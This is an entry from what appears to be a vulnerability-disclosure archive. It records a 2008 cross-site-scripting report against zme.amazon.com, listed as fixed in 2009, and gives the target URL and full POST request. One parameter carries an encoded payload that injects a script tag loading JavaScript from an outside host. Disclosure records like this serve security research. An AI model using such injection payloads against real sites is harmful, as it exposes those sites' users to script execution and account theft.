Security researcher mox, has submitted on 11/03/2008 a cross-site-scripting (XSS) vulnerability affecting zme.amazon.com, which at the time of submission ranked 39 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/03/2008. It is currently fixed. |
Date submitted: 11/03/2008 |
Date published: 11/03/2008 |
Date fixed: 14/06/2009 | Status: FIXED |
Author: mox |
Domain: zme.amazon.com |
Category: XSS |
Pagerank: 39 |
URL: https://zme.amazon.com/exec/varzea/fx-register/process-review/002-1184464-5785657 |
POST: address-daytime-phone=&address-daytime-phone-areacode=%24Q%24%2F%3E&address-daytime-phone-ext=&pipel ine-return-directly=1&pipeline-return-handler=fx-pay-pages%2Fmanage-pay-pages%2F&pipeline-return-han dler-type=post&pipeline-return-html=fx%2Fhelp%2Fgetting-started.html&pipeline-type=payee®ister-bi lling-address-id=jgmhpujplj®ister-credit-card-id=A1V46DGTZUE15I®ister-enter-checking-info=no&r egister-epay-registration-status-check=no®ister-nickname=pg5of16®ister-payment-program=tipping &input-address-daytime-phone-areacode=%22%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F %2F%3E&input-address-daytime-phone=&input-address-daytime-phone-ext=&input-register-nickname=xss&inp ut-register-enter-checking-info=no&x=0&y=0 |
Click here to view the mirror
|
|
|